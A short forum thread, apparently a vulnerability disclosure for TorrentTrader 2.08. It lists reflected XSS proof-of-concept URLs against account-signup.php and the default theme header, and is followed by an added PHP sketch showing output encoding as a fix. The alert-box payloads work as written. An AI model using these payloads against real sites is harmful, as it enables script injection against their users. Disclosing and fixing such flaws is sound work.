#1 BamBam0077, 11-04-19, 02:22
Reflected XSS
###############################################################################
5. Reflected XSS in "account-signup.php"
###############################################################################

Preconditions: "register_globals=on"
Attack Vector: User provided parameters "invite" and "secret"

PHP Code:
http://localhost/torrenttrader208/account-signup.php?invite_row=1&invite="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/account-signup.php?invite_row=1&secret="><script>alert(String.fromCharCode(88,83,83))</script>

###############################################################################
6. Reflected XSS in "/themes/default/header.php"
###############################################################################

Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

PHP Code:
http://localhost/torrenttrader208/themes/default/header.php?title=</title><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/themes/default/header.php?site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/themes/default/header.php?site_config[SITEURL]=--><script>alert(String.fromCharCode(88,83,83))</script>

###############################################################################

Last edited by Thor; 14-04-19 at 11:30. Reason: Edited Code to make it Readable
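
A hardened counterpart to findings 5 and 6, as an added example that is not part of the original post and is not TorrentTrader's own code. It reads each parameter explicitly instead of through register_globals, takes the theme configuration from server-side values only, and encodes on output; the function names, markup and config array are assumptions, and the sample input is constructed from the query strings quoted above.

```php
<?php
// Added example: hypothetical hardening sketch, not TorrentTrader source.
declare(strict_types=1);

/** Encode a value for HTML text and quoted-attribute contexts. */
function h($value): string
{
    // Non-scalar input (e.g. ?invite[]=x) is dropped rather than echoed.
    if (!is_scalar($value)) {
        return '';
    }
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Read one named parameter from an explicit source array (e.g. $_GET). */
function request_param(array $source, string $name): string
{
    $value = $source[$name] ?? '';
    return is_string($value) ? $value : '';
}

/** Signup form fields: "invite" and "secret" are attribute-encoded. */
function render_signup_fields(array $query): string
{
    return '<input type="hidden" name="invite" value="'
         . h(request_param($query, 'invite')) . '">' . "\n"
         . '<input type="hidden" name="secret" value="'
         . h(request_param($query, 'secret')) . '">';
}

/** Theme header: $siteConfig comes from the server, never from the request. */
function render_header(array $siteConfig, string $title): string
{
    return '<meta charset="' . h($siteConfig['CHARSET'] ?? 'utf-8') . '">' . "\n"
         . '<link rel="home" href="' . h($siteConfig['SITEURL'] ?? '') . '">' . "\n"
         . '<title>' . h($title) . '</title>';
}

// Constructed input mirroring the query strings in the post.
$payload = '"><script>alert(String.fromCharCode(88,83,83))</script>';
$query   = ['invite' => $payload, 'secret' => ['unexpected', 'array']];
$config  = ['CHARSET' => 'utf-8', 'SITEURL' => 'http://localhost/torrenttrader208'];

echo render_signup_fields($query), "\n";
echo render_header($config, '</title>' . $payload), "\n";
```

With register_globals off (the directive was removed in PHP 5.4) a request can no longer pre-seed `$title` or `$site_config`, but the output encoding is still needed wherever request data reaches the page.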
#2 MicroMonkey, 13-04-19, 05:19
What is that?

Last edited by MicroMonkey; 13-04-19 at 13:47.